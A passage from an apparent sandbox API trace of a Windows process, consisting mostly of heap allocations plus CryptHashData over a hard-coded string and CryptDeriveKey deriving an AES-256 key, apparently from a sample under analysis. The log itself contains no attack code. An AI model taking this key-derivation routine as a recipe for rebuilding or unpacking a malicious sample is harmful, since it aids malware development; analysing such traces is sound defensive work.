Flags=0x0, Size=0x4) returned 0x43e25a0 [0077.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2ae8 [0077.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0077.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0077.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e28a8 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2bd8 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0077.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2c08 [0077.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2bd8 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0077.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0077.149] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0077.149] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0077.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.150] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0077.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x43ca8f8 [0077.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca8f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0077.152] CryptHashData (hHash=0x41ac040, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0077.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0077.153] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0077.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0077.154] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca598 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0077.154] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0077.154] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0077.154] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0077.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0077.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0077.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0077.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0077.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0077.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.156] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0077.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0077.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43ca778 [0077.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca778, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0077.157] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac040, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac600) returned 1 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9818 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0077.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 